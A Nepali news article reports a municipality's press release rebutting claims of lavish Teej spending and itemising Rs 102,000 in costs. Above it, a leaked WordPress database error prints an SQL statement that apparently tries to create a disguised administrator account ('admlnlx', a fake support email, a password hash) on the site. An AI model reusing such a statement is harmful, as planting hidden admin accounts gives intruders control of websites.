WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7rYwjrKyQr2KaNmJzwWAZuDTVCOXO/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 13:53:44', '', 'admlnlx', 'admlnlx')
काठमाडौँ । सोलुदुधकुण्ड नगरपालिकाले तिजको बिषयमा प्रकाशित समचारको खण्डन गर्दै एक प्रेस बिज्ञाप्ति मार्फत लागत खर्च सार्वजनिक गरेको छ ।
गत आइतबार सोलुदुधकुण्ड नगरपालिकाले तीज विशेष कार्यक्रम गर्दा जम्मा एक लाख २ हजार रुपैयाँ खर्च भएको स्पष्ट पारेको छ ।
नगरपालिकाले एक प्रेस विज्ञप्ती जारी गर्दै खुला नृत्य प्रतियोगिता कार्यक्रम, शुभकामना आदानप्रदान, महिला कैदीबन्दीहरुलाई टिभिसेट खरिद लगायत कार्यक्रम गर्दा उक्त रकम खर्च भएको स्पष्ट पारेको हो ।
नगरपालिकाले जारी गरेको विज्ञप्तीमा केही स्थानीय रेडियोर र पत्रीकामा अतिरन्जीत समाचार सम्प्रेषण भएको रिपोर्टप्रति नगरपालिकाको ध्यानाकर्षण भएको जनाएको हो ।
समाचारमा तीजका लागि भोज भतेर आयोजना गरि लाखौँ रुपैयाँ खर्च गरिएको भन्ने गलत सन्देश सम्प्रेषण गरिएको भन्दै नगरपालिकाको कार्यालयले विज्ञप्ती जारी गरि संचार माध्यममा आएको समाचारमा सत्यता नभएको स्पष्ट पारेको छ । विज्ञप्तीमा भनिएको छ, ‘नगरपाकिलाले कला संस्कृतिलाई संरक्षण गर्ने उद्देश्यले खुला नृत्य प्रतियोगिता तथा शुभकामना आदानप्रदान कार्यक्रम आयोजना गरिएकोमा ४ जना विजेताहरुलाई पुरस्कार तथा कार्यक्रममा सहभागी महिलाहरुका लागि चिया खाजा गरि ६२ हजार रुपैयाँ, जिल्ला कारागार सोलुखुम्बुमा रहेका महिला कैदी बन्दीहरुका लागि ४० हजार रुपैयाँ बराबरको टेलिभिजन हस्तान्तरण गरि एक मुष्ट एक लाख २ हजार रुपैयाँ खर्च भएको छ ।’
‘संचार माध्यममा प्रकाशन/प्रसारण भए जस्तो भोज भतेर आयोजना गरेर लाखौँ रकम खर्च गरेको विषयमा कुनै सत्यता नरहेको नगरपालिकाले जनाएको छ ।’ प्रमुख प्रशासकीय अधिकृत कोपिला राईद्धारा हस्ताक्षरित विज्ञप्तीमा सोलुदुधकुण्ड नगरपालिका पारदर्शीता र जवाफदेहितामा प्रतिवद्ध रहेको जनाइएको छ ।